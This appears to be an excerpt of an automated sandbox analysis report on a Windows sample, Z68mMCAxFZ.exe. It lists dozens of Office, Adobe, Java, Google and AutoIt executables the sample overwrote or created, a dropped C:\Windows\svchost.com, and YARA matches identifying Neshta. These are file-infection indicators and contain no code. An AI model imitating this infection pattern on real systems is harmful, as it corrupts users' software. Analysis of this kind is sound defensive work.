Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; File created: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; File created: C:\ProgramData\Package Cache\{f65db027-aff3-4070-886a-0d87064aabb1}\vcredist_x86.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; File created: C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\VC_redist.x86.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; File created: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; File created: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; File created: C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\vcredist_x64.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; File created: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; File created: C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; File created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; File created: C:\Program Files (x86)\Microsoft Office\Office16\AppSharingHookController.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; File created: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; File created: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; File created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\jp2launcher.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; File created: C:\Program Files (x86)\Microsoft Office\Office16\ACCICONS.EXE
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; File created: C:\Windows\svchost.com
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; File created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\Setup.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; File created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; File created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOXMLED.EXE
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; File created: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; File created: C:\Program Files (x86)\Microsoft Office\Office16\protocolhandler.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; File created: C:\Program Files (x86)\Microsoft Office\Office16\SETLANG.EXE
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; File created: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; File created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Oarpmany.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; File created: C:\Program Files (x86)\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXE
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; File created: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateOnDemand.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; File created: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; File created: C:\Program Files (x86)\Microsoft Office\Office16\MSOUC.EXE
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; File created: C:\Program Files (x86)\Microsoft Office\Office16\PPTICO.EXE
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; File created: C:\Program Files (x86)\Common Files\microsoft shared\DW\DWTRIG20.EXE
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; File created: C:\Program Files (x86)\Microsoft Office\Office16\CNFNOT32.EXE
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; File created: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; File created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\FLTLDR.EXE
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; File created: C:\Program Files (x86)\AutoIt3\Au3Check.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; File created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\LICLUA.EXE
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; File created: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; File created: C:\Program Files (x86)\Common Files\microsoft shared\Source Engine\OSE.EXE
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; File created: C:\Program Files (x86)\Microsoft Office\Office16\DCF\SPREADSHEETCOMPARE.EXE
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; File created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSREC.EXE
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; File created: C:\Program Files (x86)\Microsoft Office\Office16\UcMapi.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; File created: C:\Program Files (x86)\Microsoft Office\Office16\WORDICON.EXE
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; File created: C:\Users\user\AppData\Local\Temp\CR_94EB1.tmp\setup.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; File created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; File created: C:\Program Files (x86)\Microsoft Office\Office16\XLICONS.EXE
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\GRAPH.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\ChromeSetup.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOSQM.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\FIRSTRUN.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\unpack200.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\CLVIEW.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javacpl.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\lynchtmlconv.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\misc.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\IEContentService.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\AutoIt3\Uninstall.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\OcPubMgr.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\SCANPST.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\VPREVIEW.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\ProgramData\Package Cache\{f65db027-aff3-4070-886a-0d87064aabb1}\vcredist_x86.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\MSQRY32.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaws.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CSISYNCCLIENT.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOICONS.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\ODeploy.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Users\user\AppData\Local\Temp\3582-490\Z68mMCAxFZ.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\DCF\filecompare.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\lync99.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\110\SQLDumper.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\SELFCERT.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\NAMECONTROLSERVER.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CMigrate.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeFile created: C:\Windows\svchost.comJump to dropped file

                  Boot Survival:

                  Yara detected Neshta
                  Source: Yara match | File source: Z68mMCAxFZ.exe, type: SAMPLE
                  Source: Yara match | File source: 0.0.Z68mMCAxFZ.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.Z68mMCAxFZ.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: Z68mMCAxFZ.exe PID: 6284, type: MEMORYSTR
                  Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\CNFNOT32.EXE, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javacpl.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\unpack200.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\SPREADSHEETCOMPARE.EXE, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Common Files\microsoft shared\Source Engine\OSE.EXE, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\misc.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\OcPubMgr.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\filecompare.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\MSQRY32.EXE, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\FIRSTRUN.EXE, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CMigrate.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\AutoIt3\Uninstall.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOXMLED.EXE, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exe, type: DROPPED
                  Source: Yara match | File source: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\SCANPST.EXE, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe, type: DROPPED
                  Source: Yara match | File source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\AutoIt3\Au3Info.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\Setup.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.EXE, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Oarpmany.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\VPREVIEW.EXE, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXE, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\NAMECONTROLSERVER.EXE, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOICONS.EXE, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe, type: DROPPED
                  Source: Yara match | File source: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\GRAPH.EXE, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSREC.EXE, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\ACCICONS.EXE, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\WORDICON.EXE, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\SELFCERT.EXE, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\AppSharingHookController.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\XLICONS.EXE, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\MSOUC.EXE, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\PPTICO.EXE, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CSISYNCCLIENT.EXE, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateOnDemand.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\AutoIt3\Au3Check.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\lync99.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXE, type: DROPPED
                  Source: Yara match | File source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe, type: DROPPED
                  Source: Yara match | File source: C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\VC_redist.x86.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\protocolhandler.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exe, type: DROPPED
